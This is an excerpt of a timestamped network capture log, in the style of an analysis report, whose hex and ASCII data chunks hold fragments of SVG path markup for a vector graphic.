                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2085INData Raw: 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 38 33 2c 31 39 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 36 2c 31 38 38 2e 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34
                                                                                                                                                                                                                                                  Data Ascii: 1,.15,2.86"/><path class="cls-4" d="M692.83,195a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M692.6,188.1a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2309INData Raw: 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 32 36 33 2e 34 31 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 31 32 2c 32 35 36 2e 34 38 61 31
                                                                                                                                                                                                                                                  Data Ascii: 2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M723.35,263.41a1.71,1.71,0,0,1-.77,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M723.12,256.48a1
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2325INData Raw: 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: ,0,0,1,.51-2.89,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2325INData Raw: 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 38 38 2c 33 33 31 2e 37 39 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 36 34 2c 33 32 34 2e 38 36 61 31 2e 37 31 2c 31 2e 37 31
                                                                                                                                                                                                                                                  Data Ascii: 24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M753.88,331.79a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M753.64,324.86a1.71,1.71
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2341INData Raw: 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 37 39 2c 32 30 36 2e 32 37 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 35 35 2c
                                                                                                                                                                                                                                                  Data Ascii: ,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M770.79,206.27a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M770.55,
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2357INData Raw: 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 33 31 2c 32 37 34 2e 36 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                                                                                                  Data Ascii: 34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M801.31,274.66a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.52-2.89,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC2741INData Raw: 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 31 2e 38 34 2c 33 34 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 2f 3e 3c 70
                                                                                                                                                                                                                                                  Data Ascii: 1,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M831.84,343a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"/><p
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC2757INData Raw: 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 38 2e 37 35 2c 32 31 37 2e 35 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c
                                                                                                                                                                                                                                                  Data Ascii: 73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.41,2.41,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M848.75,217.52a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC2773INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 35 2c 32 39 32 2e 38 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e
                                                                                                                                                                                                                                                  Data Ascii: cls-4" d="M879.5,292.83a1.72,1.72,0,0,1-.77,2.24,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC2789INData Raw: 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 30 2c 33 36 31 2e 32 31 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 39 2e 37 39 2c 33 35 34 2e 32 38 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33
                                                                                                                                                                                                                                                  Data Ascii: 2.86"/><path class="cls-4" d="M910,361.21a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M909.79,354.28a1.71,1.71,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.3
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC2805INData Raw: 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 39 34 2c 32 33 35 2e 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 37 2c 32 32 38 2e 37 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32
                                                                                                                                                                                                                                                  Data Ascii: 9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M926.94,235.7a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M926.7,228.76a1.72,1.72,0,0,1-.78,2.24,2
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC2821INData Raw: 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 31 31 2c 31 37 30 2e 35 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 33 34 2c 31 37 37 2e 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32
                                                                                                                                                                                                                                                  Data Ascii: 82"/><path class="cls-4" d="M1027.11,170.57a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M1027.34,177.4a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3109INData Raw: 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 36 39 2c 33 30 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 39 37 2e 35 31 2c 31 31 36 2e 38 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33
                                                                                                                                                                                                                                                  Data Ascii: -.16-2.81"/><path class="cls-4" d="M1010.69,301a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M997.51,116.88a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.3
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3125INData Raw: 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31 2e 30 39 2c 32 34 37 2e 33 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31
                                                                                                                                                                                                                                                  Data Ascii: .37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M981.09,247.32a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M981
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3141INData Raw: 2c 31 38 36 2e 38 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 31 2e 34 39 2c 31 39 33 2e 36 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e
                                                                                                                                                                                                                                                  Data Ascii: ,186.81a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M951.49,193.64a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3157INData Raw: 30 2c 31 2d 32 2e 38 36 2c 30 41 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 39 32 32 2c 31 32 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 36 37 2c 31 33 33 2e 31 32 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 39 2c 31 34 30 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: 0,1-2.86,0A2.09,2.09,0,0,1,922,125"/><path class="cls-4" d="M921.67,133.12a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"/><path class="cls-4" d="M921.9,140a1.68,1.68,0,0,1,.76-2.2,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3173INData Raw: 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 34 37 2c 32 37 30 2e 33 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 41 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2c 39 30 39 2c 32 37 32 61 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c
                                                                                                                                                                                                                                                  Data Ascii: 48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.47,270.39a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.29.93A2.38,2.38,0,0,1,909,272a2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3189INData Raw: 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 36 35 2c 32 30 39 2e 38 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 38 38 2c 32 31 36 2e 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
